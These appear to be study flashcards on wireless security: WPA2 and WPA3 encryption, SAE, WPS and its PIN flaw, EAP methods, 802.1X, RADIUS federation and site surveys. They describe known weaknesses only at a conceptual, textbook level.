3.4 Wireless Security Settings Flashcards
• An organization’s wireless network can contain confidential
information
– Not everyone is allowed access
• Authenticate the users before granting access
– Who gets access to the wireless network?
– Username, password, multi-factor authentication
• Ensure that all communication is confidential
– Encrypt the wireless data
• Verify the integrity of all communication
– The received data should be identical to the
original sent data
– A message integrity check (MIC)
Securing a wireless network
• All wireless computers are radio transmitters and receivers
– Anyone can listen in
• Solution: Encrypt the data - Everyone has an encryption key
• Only people with the right key can transmit and listen
– WPA2 and WPA3
Wireless encryption
• Wi-Fi Protected Access II (WPA2)
– WPA2 certification began in 2004
• CCMP block cipher mode
– Counter Mode with Cipher Block Chaining
– Message Authentication Code Protocol, or
– Counter/CBC-MAC Protocol
• CCMP security services
– Data confidentiality with AES
– Message Integrity Check (MIC) with CBC-MAC
WPA2 and CCMP
• Wi-Fi Protected Access 3 (WPA3) - Introduced in 2018 • GCMP block cipher mode – Galois/Counter Mode Protocol – A stronger encryption than WPA2 • GCMP security services – Data confidentiality with AES – Message Integrity Check (MIC) with – Galois Message Authentication Code (GMAC)
WPA3 and GCMP
• WPA2 has a PSK brute-force problem
– Listen to the four-way handshake
– Some methods can derive the PSK hash without
the handshake
– Capture the hash
• With the hash, attackers can brute force the
pre-shared key (PSK)
• This has become easier as technology improves
– A weak PSK is easier to brute force
– GPU processing speeds
– Cloud-based password cracking
• Once you have the PSK, you have everyone’s
wireless key
– There’s no forward secrecy
The WPA2 PSK problem
• WPA3 changes the PSK authentication process
– Includes mutual authentication
– Creates a shared session key without sending that
key across the network
– No more four-way handshakes, no hashes,
no brute force attacks
– Adds perfect forward secrecy
• Simultaneous Authentication of Equals (SAE)
– A Diffie-Hellman derived key exchange with an
authentication component
– Everyone uses a different session key, even with
the same PSK
– An IEEE standard - the dragonfly handshake
SAE
• Gain access to a wireless network – Mobile users – Temporary users • Credentials – Shared password / pre-shared key (PSK) – Centralized authentication (802.1X) • Configuration – Part of the wireless network connection – Prompted during the connection process
Wireless authentication methods
• Configure the authentication on your wireless access point / wireless router • Open System – No password is required • WPA3-Personal / WPA3-PSK – WPA3 with a pre-shared key – Everyone uses the same key – Unique WPA3 session key is derived from the PSK using SAE (Simultaneous Authentication of Equals) • WPA3-Enterprise / WPA3-802.1X – Authenticates users individually with an authentication server (i.e., RADIUS)
Wireless security modes
• Authentication to a network - Common on wireless networks
• Access table recognizes a lack of authentication
– Redirects your web access to a captive portal page
• Username / password - And additional authentication factors
• Once proper authentication is provided, the
web session continues
– Until the captive portal removes your access
Captive Portal
• Wi-Fi Protected Setup
– Originally called Wi-Fi Simple Config
• Allows “easy” setup of a mobile device
– A passphrase can be complicated to a novice
• Different ways to connect
– PIN configured on access point must be entered
on the mobile device
– Push a button on the access point
– Near-field communication -
– Bring the mobile device close to the access point
Using WPS
• December 2011 - WPS has a design flaw
– It was built wrong from the beginning
• PIN is an eight-digit number
– Really seven digits and a checksum
– Seven digits, 10,000,000 possible combinations
• The WPS process validates each half of the PIN
– First half, 4 digits. Second half, 3 digits.
– First half, 10,000 possibilities,
second half, 1,000 possibilities
• It takes about four hours to go through all of them
– Most devices never considered a lockout function
– Brute force lockout features are now the norm
The WPS hack
• We’ve created many authentication methods
through the years
– A network administrator has many choices
• Use a username and password
– Other factors can be included
• Commonly used on wireless networks
– Also works on wired networks
Wireless authentication
• Extensible Authentication Protocol (EAP)
– An authentication framework
• Many different ways to authenticate based on
RFC standards
– Manufacturers can build their own EAP methods
• EAP integrates with 802.1X
– Prevents access to the network until the
authentication succeeds
EAP
• IEEE 802.1X
– Port-based Network Access Control (NAC)
– You don’t get access to the network until you
authenticate
• Used in conjunction with an access database
– RADIUS, LDAP, TACACS+
IEEE 802.1X
• Supplicant – The client • Authenticator – The device that provides access • Authentication server – Validates the client credentials
IEEE 802.1X and EAP
• EAP Flexible Authentication via Secure Tunneling
– Authentication server (AS) and supplicant share a
protected access credential (PAC) (shared secret)
• Supplicant receives the PAC
• Supplicant and AS mutually authenticate and
negotiate a Transport Layer Security (TLS) tunnel
• User authentication occurs over the TLS tunnel
• Need a RADIUS server
– Provides the authentication database and
EAP-FAST services
EAP-FAST
• Protected Extensible Authentication Protocol
– Protected EAP
– Created by Cisco, Microsoft, and RSA Security
• Also encapsulates EAP in a TLS tunnel
– AS uses a digital certificate instead of a PAC
– Client doesn’t use a certificate
• User authenticates with MSCHAPv2
– Authenticates to Microsoft’s MS-CHAPv2 databases
• User can also authenticate with a GTC
– Generic Token Card, hardware token generator
PEAP
• EAP Transport Layer Security – Strong security, wide adoption – Support from most of the industry • Requires digital certificates on the AS and all other devices – AS and supplicant exchange certificates for mutual authentication – TLS tunnel is then built for the user authentication process • Relatively complex implementation – Need a public key infrastructure (PKI) – Must deploy and manage certificates to all wireless clients – Not all devices can support the use of digital certificates
EAP-TLS
• EAP Tunneled Transport Layer Security
– Support other authentication protocols
in a TLS tunnel
• Requires a digital certificate on the AS
– Does not require digital certificates on every device
– Builds a TLS tunnel using this digital certificate
• Use any authentication method inside the TLS tunnel
– Other EAPs
– MSCHAPv2
– Anything else
EAP-TTLS
• Use RADIUS with federation
– Members of one organization can authenticate to
the network of another organization
– Use their normal credentials
• Use 802.1X as the authentication method
– And RADIUS on the backend - EAP to authenticate
• Driven by eduroam (education roaming)
– Educators can use their normal authentication
when visiting a different campus
– https://www.eduroam.org/
RADIUS Federation
• Determine existing wireless landscape – Sample the existing wireless spectrum • Identify existing access points – You may not control all of them • Work around existing frequencies – Layout and plan for interference • Plan for ongoing site surveys – Things will certainly change • Heat maps - Identify wireless signal strengths
Site surveys
- Signal coverage
- Potential interference
- Built-in tools
- 3rd-party tools
- Spectrum analyzer
Wireless survey tools
• Wireless networks are incredibly easy to monitor
– Everyone “hears” everything
• You have to be quiet
– You can’t hear the network if you’re busy transmitting
• Some network drivers won’t capture wireless information
– You’ll need specialized adapters/chipsets and drivers
• View wireless-specific information
– Signal-to-noise ratio, channel information, etc.
• Try it yourself! - https://www.wireshark.org
Wireless packet analysis
• Overlapping channels
– Frequency conflicts - use non-overlapping channels
– Automatic or manual configurations
Channel selection and overlaps
